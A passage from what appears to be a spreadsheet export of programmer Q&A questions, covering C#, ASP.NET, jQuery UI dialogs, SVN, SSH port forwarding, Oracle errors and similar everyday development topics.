    <t xml:space="preserve">&lt;p&gt;We've been using "Drip" to try and identify why pages with UpdatePanels in them tend to use a lot of client-side memory.  With a page with a regular postback, we are seeing 0 leaks detected by Drip.  However, when we add an update panel to the mix, every single DOM object that is inside of the update panel appears to leak (according to Drip).&lt;/p&gt;
&lt;p&gt;I am not certain is Drip is reliable enough to report these kinds of things - the reported leaks do seem to indicate Drip is modifying the page slightly.  &lt;/p&gt;
&lt;p&gt;Does anyone have any experience with this?  Should I panic and stop using Microsoft Ajax?  I'm not above doubting Microsoft, but it seems fishy to me that it could be &lt;em&gt;this&lt;/em&gt; bad.&lt;/p&gt;
&lt;p&gt;Also, if you know of a tool that is better than Drip, that would be helpful as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to use a property to reference a Key-Value pair in a dictionary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a fairly trivial matter, but I'm curious to hear people's opinions on it.&lt;/p&gt;
&lt;p&gt;If I have a Dictionary which I'm access through properties, which of these formats would you prefer for the property?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;
/// This class's FirstProperty property
/// &amp;lt;/summary&amp;gt;
[DefaultValue("myValue")]
public string FirstProperty {
    get {
        return Dictionary["myKey"];
    }
    set {
        Dictionary["myKey"] = value;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is probably the typical way of doing it. It's fairly efficient, easy to understand, etc. The only disadvantage is with a longer or more complex key it would be possible to misspell it or change only one instance or something, leading me to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;
/// This class's SecondProperty property
/// &amp;lt;/summary&amp;gt;
[DefaultValue("myValue")]
private const string DICT_MYKEY = "myKey"
public string SecondProperty {
    get {
        return Dictionary[DICT_MYKEY];
    }
    set {
        Dictionary[DICT_MYKEY] = value;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is marginally more complicated, but seems to offer additional safety, and is closer to what I would think of as the "Code Complete" solution. The downside is that when you also have a ///  block and a [DefaultValue()] block above the property already, it starts getting a bit crowded up there.&lt;/p&gt;
&lt;p&gt;So which do you like better, and why? Does anybody have any better ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for a simple JavaScript example that updates DOM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a simple JavaScript example that updates DOM.&lt;br&gt;
Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between foreach and for loops over an IEnumerable class in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been told that there is a performance difference between the following code blocks.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach (Entity e in entityList)
{
 ....
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i=0; i&amp;lt;entityList.Count; i++)
{
   Entity e = (Entity)entityList[i];
   ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;Entity&amp;gt; entityList;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am no CLR expect but from what I can tell they should boil down to basically the same code.  Does anybody have concrete (heck, I'd take packed dirt) evidence one way or the other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can .NET check other running programs command line parameters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've got an interesting case where we are trying to determine how different instances of our app were launched. Is there any way for .NET to be able to query another running instance and get the command line parameters passed to that instance? I've not been able to find any way to do it in .NET so far, so I thought I'd check here to see if anyone had done anything like this before.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Order an Array like another Array in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the best algorithm to take array A {0,1,2,3} and make order it like array B {3,1,0,2}.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best keyboard macros for programming in windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like putting shortcuts of the form "g - google.lnk" in my start menu so google is two keystrokes away. Win, g.&lt;/p&gt;
&lt;p&gt;My eight or so most frequent applications go there.&lt;/p&gt;
&lt;p&gt;I also make links to my solution files I am always opening "x - Popular Project.lnk"&lt;/p&gt;
&lt;p&gt;Are there any better ways to automate opening frequently used applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the ClickOnce Publish version to match the AssemblyInfo.cs File version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every time I publish the application in &lt;a href="http://en.wikipedia.org/wiki/ClickOnce" rel="nofollow"&gt;ClickOnce&lt;/a&gt; I get get it to update the revision number by one. Is there a way to get this change automatically to change the version number in AssemblyInfo.cs file (all our error reporting looks at the Assembly Version)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>version control practice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my current job the supervisor's practice is to only check in production ready code.  Most recently the project I was on involved work by 3 different developers with some file overlap.  This meant manually integrating changes despite the fact that some changes took a day and then it was done.  I wanted to see if this was a common practice and get suggestions on how to change this practice with the knowledge that many times my opinion means little in the grand scheme of things.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex in VB6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a program that can sift through specially-formatted text files (essentially CSV files with a fixed set of column types that have different delimiters for some columns ... comma in most places, colons in others) to search for formatting errors.  I figure regular expressions will be the way to go.&lt;/p&gt;
&lt;p&gt;The question:  Is there a good regex library for VB6?&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
&lt;p&gt;Edit:  Holy crap, 3 responses in under an hour.  Thanks a ton, folks!  I've heard such good things about Regex Buddy from Jeff's postings / podcasting, that I will have to take a look.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse "Share Project" by hand?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What actually happens to the file system when you do a Subclipse Share Project on an Eclipse project that was externally checked out from Subversion?  All the .svn folders are already in place.  I get an error when I try to Share Project the right way, and I'd rather not delete and re-checkout the projects from the SVN  Repository browser.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to implement a SQL script that will grant permissions to a database role on all the user tables in a database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to implement a SQL script that will grant select, references, insert, update, and delete permissions to a database role on all the user tables in a database?&lt;/p&gt;
&lt;p&gt;Ideally, this script could be run multiple times, as new tables were added to the database. SQL Server Management Studio generates scripts for individual database objects, but I'm looking for more of a "fire-and-forget" script.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Learning CIL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know any good resources for learning how to program CIL with in-depth descriptions of commands, etc.? I have looked around but not found anything particularly good.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I programmatically determine if my workstation is locked?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing up some productivity/metrics tools for myself to help monitor my focus throughout the day. Recently, I've noticed that I tend to get off track more than usual and feel the need to get up and go for walks/drinks/etc and I'm concerned that I'm "wasting" too much time.&lt;/p&gt;
&lt;p&gt;Since I always lock my computer when I go anywhere, and I unlock it as soon as I return (even if I'm just reading at my desk, etc), I was wondering how I can determine, in code, how long the machine is locked.&lt;/p&gt;
&lt;p&gt;I'm writing this in C# if that helps, but I'm open to other ideas.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I like the windows service idea (and have accepted it) for simplicity and cleanliness, but unfortunately I don't think it will work for me in this particular case. I wanted to run this on my workstation at work rather than home (or in addition to home, I suppose), but it's locked down pretty hard courtesy of the DoD. That's part of the reason I'm rolling my own, actually.&lt;/p&gt;
&lt;p&gt;I'll write it up anyway and see if it works. Thanks everyone!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to parse a string into a nullable int</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wanting to parse a string into a nullable int in C#.  ie. I want to get back either the int value of the string or null if it can't be parsed.&lt;/p&gt;
&lt;p&gt;I was kind of hoping that this would work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int? val = stringVal as int?;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that won't work, so the way I'm doing it now is I've written this extension method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static int? ParseNullableInt(this string value)
{
	if (value == null || value.Trim() == string.Empty)
	{
		return null;
	}
	else
	{
		try
		{
			return int.Parse(value);
		}
		catch
		{
			return null;
		}
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better way of doing this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;  Thanks for the TryParse suggestions, I did know about that, but it worked out about the same.  I'm more interested in knowing if there is a built-in framework method that will parse directly into a nullable int?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problems with disabling IIS shutdown of idle worker process?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran into an issue with an IIS web app shutting down an idle worker process.  The next request would then have to re-initialize the application, leading to delays.  I disabled the IIS shutdown of idle worker processes on the application pool to resolve this.  Are there any issues associated with turning this off?  If the process is leaking memory, I imagine it is nice to recycle the process every now and then.  Are there any other benefits to having this process shutdown?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to forward ssh requests that come in over a certain port to another machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small local network. Only one of the machines is available to the outside world (this is not easily changeable). I'd like to be able to set it up such that ssh requests that don't come in on the standard port go to another machine. Is this possible? If so, how?&lt;/p&gt;
&lt;p&gt;Oh and all of these machines are running either Ubuntu or OS X. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Friendly URLs for ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Python frameworks always provide ways to handle URLs that convey the data of the request in an elegant way, like for example &lt;a href="http://somewhere.overtherainbow.com/userid/123424/"&gt;http://somewhere.overtherainbow.com/userid/123424/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I want you to notice the ending path &lt;strong&gt;/userid/123424/&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;How do you do this in ASP.NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Source control system for single developer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the recommended source control system for a very small team (one developer)?&lt;BR&gt;&lt;BR&gt;
Price does not matter. Customer would pay :-)&lt;BR&gt;
I'm working on Vista32 with VS 2008 in C++ and later in C# and with WPF. Setting up an extra (physical) server for this seems overkill to me. &lt;BR&gt;&lt;BR&gt;Any opinions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggest some good MVC framework in perl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you suggest some good MVC framework for perl -- one I am aware of is &lt;a href="http://www.catalystframework.org/" rel="nofollow"&gt;catalyst&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The need is to be able to expose services on the perl infrastructure which can be called by Java/.Net applications seamlessly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wacom tablet Python interface</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If possible I want to catch pressure sensitive input from a Wacom tablet in Python. Are there any Python libraries available that can do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I call a .NET DLL from an Inno Setup script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to call a function from a .NET DLL (coded in C#) from an Inno Setup script.&lt;/p&gt;
&lt;p&gt;I have:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;marked the &lt;em&gt;Register for COM interop&lt;/em&gt; option in the project properties,&lt;/li&gt;
&lt;li&gt;changed the &lt;em&gt;ComVisible&lt;/em&gt; setting in the &lt;em&gt;AssemblyInfo.cs&lt;/em&gt; file,&lt;/li&gt;
&lt;li&gt;added these lines to the ISS script:&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
  &lt;p&gt;[Files]&lt;/p&gt;
  &lt;p&gt;Source: c:\temp\1\MyDLL.dll; Flags: dontcopy&lt;/p&gt;
  &lt;p&gt;[Code]&lt;/p&gt;
  &lt;p&gt;function MyFunction(): string;&lt;/p&gt;
  &lt;p&gt;external 'MyFunction@files:MyDLL.dll stdcall setuponly';&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;but I still get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Runtime Error (at -1:0):&lt;/p&gt;
  &lt;p&gt;Cannot Import dll:C:\DOCUME~1\foo\LOCALS~1\Temp\is-LRL3E.tmp\MyDLL.dll.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to know whether a window with a given title is already open in Tk?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™ve writen a little python script that just pops up a message box containing the text passed on the command line. I want to pop it up only when the window â€”resulting from a previous callâ€” is not open.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from Tkinter import *
import tkMessageBox
root = Tk()
root.withdraw() 
# TODO not if a window with this title exists
tkMessageBox.showinfo("Key you!", " ".join(sys.argv[1:]))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any idea how to check that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A issue with the jquery dialog when using the themeroller css</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;a href="http://dev.jquery.com/view/trunk/ui/demos/functional/#ui.dialog" rel="nofollow"&gt;demos&lt;/a&gt; for the jquery ui dialog all use the "flora" theme. I wanted a customized theme, so I used the themeroller to generate a css file. When I used it, everything seemed to be working fine, but later I found that I can't control any input element contained in the dialog (i.e, can't type into a text field, can't check checkboxes). Further investigation revealed that this happens if I set the dialog attribute "modal" to true. This doesn't happen when I use the flora theme. &lt;/p&gt;
&lt;p&gt;Here is the js file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;topMenu = {
    init: function(){
        $("#my_button").bind("click", function(){
            $("#SERVICE03_DLG").dialog("open");
            $("#something").focus();
        });
        $("#SERVICE03_DLG").dialog({ 
            autoOpen: false,
            modal: true, 
            resizable: false,
            title: "my title",
            overlay: { 
                opacity: 0.5, 
                background: "black" 
            }, 
            buttons: { 
                "OK": function() { 
                    alert("hi!");
                }, 
                "cancel": function() { 
                    $(this).dialog("close"); 
                } 
            },
            close: function(){
                $("#something").val("");
            }
        });
    }
}
$(document).ready(topMenu.init);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the html that uses the flora theme:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS"&amp;gt;
&amp;lt;title&amp;gt;sample&amp;lt;/title&amp;gt;
&amp;lt;script src="jquery-1.2.6.min.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;link rel="stylesheet" href="flora/flora.all.css" type="text/css"&amp;gt;
&amp;lt;script src="jquery-ui-personalized-1.5.2.min.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src="TopMenu.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;input type="button" value="click me!" id="my_button"&amp;gt;
&amp;lt;div id="SERVICE03_DLG" class="flora"&amp;gt;please enter something&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;label for="something"&amp;gt;somthing:&amp;lt;/label&amp;gt;&amp;amp;nbsp;&amp;lt;input name="something" id="something" type="text" maxlength="20" size="24"&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the html that uses the downloaded themeroller theme:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS"&amp;gt;
&amp;lt;title&amp;gt;sample&amp;lt;/title&amp;gt;
&amp;lt;script src="jquery-1.2.6.min.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;link rel="stylesheet" href="jquery-ui-themeroller.css" type="text/css"&amp;gt;
&amp;lt;script src="jquery-ui-personalized-1.5.2.min.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src="TopMenu.js" language="JavaScript"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;input type="button" value="click me!" id="my_button"&amp;gt;
&amp;lt;div id="SERVICE03_DLG" class="ui-dialog"&amp;gt;please enter something&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;label for="something"&amp;gt;somthing:&amp;lt;/label&amp;gt;&amp;amp;nbsp;&amp;lt;input name="something" id="something" type="text" maxlength="20" size="24"&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, only the referenced css file and class names are different.
Anybody have a clue as to what could be wrong?&lt;/p&gt;
&lt;p&gt;@David: I tried it, and it doesn't seem to work (neither on FF or IE). I tried inline css:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;style="z-index:5000"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I've also tried it referencing an external css file:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;#SERVICE03_DLG{z-index:5000;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But neither of these work. Am I missing something in what you suggested?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;br&gt;
Solve by brostbeef!&lt;br&gt;
Since I was originally using flora, I had mistakenly assumed that I have to specify a class attribute. Turns out, this is only true when you actually use the flora theme (as in the samples). If you use the customized theme, specifying a class attribute causes that strange behaviour.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Common Files in Visual Studio Solution</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Many times I have seen Visual Studio solutions which have multiple projects that share source files.  These common source files are usually out in a common directory and in the solution explorer their icon shows up with a link arrow in the bottom left.&lt;/p&gt;
&lt;p&gt;However, any time I try to add a source file to the project that is outside of that project's main directory, it just automatically copies it into the directory so that I no longer have  a shared copy.&lt;/p&gt;
&lt;p&gt;I found that I can get around this by manually opening the project file in a text editor and modifying the path to something like "../../../Common/Source.cs"  but this is more of a hack then I would like.&lt;/p&gt;
&lt;p&gt;Is there a setting or something I can change that will allow me to do this from within the IDE?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Editor for OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/12073/what-is-the-best-xml-editor" rel="nofollow"&gt;http://stackoverflow.com/questions/12073/what-is-the-best-xml-editor&lt;/a&gt; was a great question regarding XML editors on Windows. What about on OS X?&lt;/p&gt;
&lt;p&gt;Oxygen is feature complete, but, it's a Java app and a  bit clunky on OSX. It's also extremely expensive.&lt;/p&gt;
&lt;p&gt;Anything Mac native and comparable in features for less than $300 ?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Andrew&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Force Form Focus</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I did search google and SO prior to asking this question. Basically I have a DLL that has a form compiled into it. The form will be used to display information to the screen. Eventually it will be asynchronous and expose a lot of customization in the dll. For now I just want it to display properly. The problem that I am having is that I use the dll by loading it in a Powershell session. So when I try to display the form and get it to come to the top and have focus, It has no problem with displaying over all the other apps, but I can't for the life of me get it to display over the Powershell window. Here is the code that I am currently using to try and get it to display. I am sure that the majority of it won't be required once I figure it out, this just represents all the things that I found via google.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CLass Blah
{
        [DllImport("user32.dll", EntryPoint = "SystemParametersInfo")]
        public static extern bool SystemParametersInfo(uint uiAction, uint uiParam, uint pvParam, uint fWinIni);
        [DllImport("user32.dll", EntryPoint = "SetForegroundWindow")]
        public static extern bool SetForegroundWindow(IntPtr hWnd);
        [DllImport("User32.dll", EntryPoint = "ShowWindowAsync")]
        private static extern bool ShowWindowAsync(IntPtr hWnd, int cmdShow);
        private const int WS_SHOWNORMAL = 1;
    public void ShowMessage(string msg)
    {
            MessageForm msgFrm = new MessageForm();
            msgFrm.lblMessage.Text = "FOO";
            msgFrm.ShowDialog();
            msgFrm.BringToFront();
            msgFrm.TopMost = true;
            msgFrm.Activate();
            SystemParametersInfo((uint)0x2001, 0, 0, 0x0002 | 0x0001);
            ShowWindowAsync(msgFrm.Handle, WS_SHOWNORMAL);
            SetForegroundWindow(msgFrm.Handle);
            SystemParametersInfo((uint)0x2001, 200000, 200000, 0x0002 | 0x0001);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As I say I'm sure that most of that is either not needed or even flat out wrong, I just wanted to show the things that I had tried. Also, as I mentioned, I plan to have this be asynchronously displayed at some point which I suspect will wind up requiring a separate thread. Would splitting the form out into it's own thread make it easier to cause it to get focus over the Powershell session? &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;@Joel, thanks for the info. Here is what I tried based on your suggestion:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;msgFrm.ShowDialog();
msgFrm.BringToFront();
msgFrm.Focus();
Application.DoEvents();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The form still comes up &lt;em&gt;under&lt;/em&gt; the Powershell session. I'll proceed with working out the threading. I've spawned threads before but never where the parent thread needed to talk to the child thread, so we'll see how it goes.&lt;/p&gt;
&lt;p&gt;Thnks for all the ideas so far folks.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Ok, threading it took care of the problem. @Quarrelsome, I did try both of those. Neither (nor both together) worked. I am curious as to what is evil about using threading? I am not using Application.Run and I have yet to have a problem. I am using a mediator class that both the parent thread and the child thread have access to. In that object I am using a ReaderWriterLock to lock one property that represents the message that I want displayed on the form that the child thread creates. The parent locks the property then writes what should be displayed. The child thread locks the property and reads what it should change the label on the form to. The child has to do this on a polling interval (I default it to 500ms) which I'm not real happy about, but I could not find an event driven way to let the child thread know that the proerty had changed, so I'm stuck with polling.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you move a file in SVN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using TortoiseSVN against the SourceForge SVN repository. I'd like to move a file from one folder to another in order to maintain its revision history. Is this possible? If so, how do you do it?&lt;/p&gt;
&lt;p&gt;(My current strategy has been to copy the file into the new folder and check it in and then delete the file from the current folder.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I group in memory lists?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list of &lt;code&gt;Foo&lt;/code&gt;. Foo has properties &lt;code&gt;Bar&lt;/code&gt; and &lt;code&gt;Lum&lt;/code&gt;. Some &lt;code&gt;Foo&lt;/code&gt;s have identical values for &lt;code&gt;Bar&lt;/code&gt;. How can I use lambda/linq to group my &lt;code&gt;Foo&lt;/code&gt;s by &lt;code&gt;Bar&lt;/code&gt; so I can iterate over each grouping's &lt;code&gt;Lum&lt;/code&gt;s?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting an int representation of a String</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to create an int\long representation of an arbitrary alpha-numeric String. Hash codes won't do it, because I can't afford hash collisions i.e. the representation must be unique and repeatable. &lt;/p&gt;
&lt;p&gt;The numeric representation will be used to perform efficient (hopefully) compares. The creation of the numeric key will take some time, but it only has to happen once, whereas I need to perform vast numbers of comparisons with it - which will hopefully be much faster than comparing the raw Strings.&lt;/p&gt;
&lt;p&gt;Any other idea's on faster String comparison will be most appreciated too...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone app crashing with NSUnknownKeyException setValue:forUndefinedKey:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing my first iPhone app, so I haven't gotten around to figuring out much in the way of debugging.
Essentially my app displays an image and when touched plays a short sound.
When compiling and building the project in XCode, everything builds successfully, but when the app is run in the iPhone simulator, it crashes.&lt;/p&gt;
&lt;p&gt;I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Application Specific Information:
iPhone Simulator 1.0 (70), iPhone OS 2.0 (5A331)
*** Terminating app due to uncaught exception 'NSUnknownKeyException', 
reason: '[&amp;lt;UIView 0x34efd0&amp;gt; setValue:forUndefinedKey:]: this class is not key value 
coding-compliant for the key kramerImage.'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;kramerImage here is the image I'm using for the background.&lt;/p&gt;
&lt;p&gt;I'm not sure what NSUnknownKeyException means or why the class is not key value coding-compliant for the key.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>web site structure/architecture</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What web site structure(s)/architecture(s) would the community swear by, with a narrowing down in the direction towards more of a small facebook style project?&lt;/p&gt;
&lt;p&gt;I understand the question to be rather broad/subjective; but being relatively new to the area of web development, I find just looking at and learning from examples of working projects most times extremely helpful, and that at other times just blows my mind and changes how I construct future assignments.&lt;/p&gt;
&lt;p&gt;With the latter paragraph in mind, does the community have any suggestions on places to look/articles to read?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Center a block of content when you don't know its width in advance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After lots of attempts and search I have never found a satisfactory way to do it with CSS2.&lt;/p&gt;
&lt;p&gt;A simple way to accomplish it is to wrap it into a handy &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt; as shown in the sample below. Do you know how to do it avoiding table layouts and also avoiding quirky tricks?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
        &amp;lt;style type="text/css"&amp;gt;
            table 
            {
                margin:0px auto 0 auto;
            }
        &amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
    &amp;lt;body&amp;gt;
        &amp;lt;table&amp;gt;
            &amp;lt;tr&amp;gt;
                &amp;lt;td&amp;gt;test&amp;lt;br/&amp;gt;test&amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;
        &amp;lt;/table&amp;gt;
    &amp;lt;/body&amp;gt;
&amp;lt;html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;What I want to know is how to do it without a fixed width and also being a block.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't Oracle tell you WHICH table or view does not exist?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you've used Oracle, you've probably gotten the helpful message "ORA-00942: Table or view does not exist". Is there a legitimate technical reason the message doesn't include the name of the missing object? &lt;/p&gt;
&lt;p&gt;Arguments about this being due to security sound like they were crafted by the TSA. If I'm an attacker, I'd know what table I just attempted to exploit, and be able to interpret this unhelpful message easily. If I'm a developer working with a complex join through several layers of application code, it's often very difficult to tell.&lt;/p&gt;
&lt;p&gt;My guess is that when this error was originally implemented, someone neglected to add the object name, and now, people are afraid it will break compatibility to fix it. (Code doing silly things like parsing the error message will be confused if it changes.)&lt;/p&gt;
&lt;p&gt;Is there a developer-friendly (as opposed to recruiting your DBA) way to determine the name of the missing table?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Although I've accepted an answer which is relevant to the topic, it doesn't really answer my question: &lt;em&gt;Why isn't the name part of the error message?&lt;/em&gt; If anyone can come up with the real answer, I'll be happy to change my vote.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showing a hint for a C# winforms edit control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a C# winforms application (VS.NET 2008, .NET 3.5 sp 1). I have a search field on a form, and rather than have a label next to the search field I'd like to show some grey text in the background of the search field itself ('Search terms', for example). When the user starts entering text in the search field the text should disappear. How can I achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reference material for LabVIEW</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm supposed to learn how to use &lt;a href="http://www.ni.com/labview/"&gt;LabVIEW&lt;/a&gt; for my new job, and I'm wondering if anybody can recommend some good books or reference/tutorial web sites.&lt;/p&gt;
&lt;p&gt;I'm a senior developer with lots of Java/C#/C++ experience.&lt;/p&gt;
&lt;p&gt;I realize that this question is perhaps more vague than is intended on stack overflow, so how about this? Please answer with one book or web site and a brief description. Then people can vote up their favourites.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good Fogbugz client for Mac OS X?</t>
